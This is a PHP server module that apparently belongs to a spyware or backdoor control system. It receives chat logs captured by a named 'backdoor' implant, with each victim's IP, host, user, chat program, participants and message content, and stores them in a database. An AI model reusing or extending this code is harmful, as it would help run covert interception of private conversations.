<?php

//////////
///
///   log_chat.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_SERV) {
   $dm['log_chat.add']                 ['function'] = 'log_chat_add';
}



/***************\
*   FUNCTIONS   *
\***************/

function log_chat_add($backdoor, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= program
   // varchar2  <= topic
   // varchar3  <= users
   // int1      <= -
   // int2      <= -
   // int3      <= -
   // longtext1 <= content
   // longblob1 <= -

   foreach($logarray as &$log) {
      if(isset($log['contentfile']) && isset($_SESSION['upload'][$log['contentfile']])) {
         $log['_content'] = file_get_contents(sys_get_temp_dir().'/'.$log['contentfile']);
         unlink(sys_get_temp_dir().'/'.$log['contentfile']);
         unset($_SESSION['upload'][$log['contentfile']]);
      } else {
         $log['content'] = $log['content'];
      }
   }
   unset($log);

   $ret = db_escape(array(&$backdoor,
                          &$remoteip,
                          &$remotehost,
                          &$remoteuser,
                          &$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }

   $backdoor_id = $ret[0]->backdoor_id;

   foreach($logarray as $log) {
      if(isset($log['_content'])) {
         $ret = db_escape_file($log['_content']);
         if(is_object($ret)) {
            return $ret;
         }
         $log['content'] = &$log['_content'];
      }

      $sql  = "INSERT INTO `log` (`backdoor_id`, ";
      $sql .=                    "`type`, ";
      $sql .=                    "`remoteip`, ";
      $sql .=                    "`remotehost`, ";
      $sql .=                    "`remoteuser`, ";
      $sql .=                    "`received`, ";
      $sql .=                    "`acquired`, ";
      $sql .=                    "`varchar1`, ";
      $sql .=                    "`varchar2`, ";
      $sql .=                    "`varchar3`, ";
      $sql .=                    "`longtext1`) ";
      $sql .= "VALUES ('$backdoor_id', ";
      $sql .=         "'CHAT', ";
      $sql .=         "'$remoteip', ";
      $sql .=         "'$remotehost', ";
      $sql .=         "'$remoteuser', ";
      $sql .=         "UTC_TIMESTAMP(), ";
      $sql .=         "'".str_replace(':', '', $log['acquired']->scalar)."', ";
      $sql .=         "'".$log['program']."', ";
      $sql .=         "'".$log['topic']."', ";
      $sql .=         "'".$log['users']."', ";
      $sql .=         "'";
      $sql .=           $log['content'];
      $sql .=         "')";

      $log = false;

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      }
   }

   return true;
}

?>
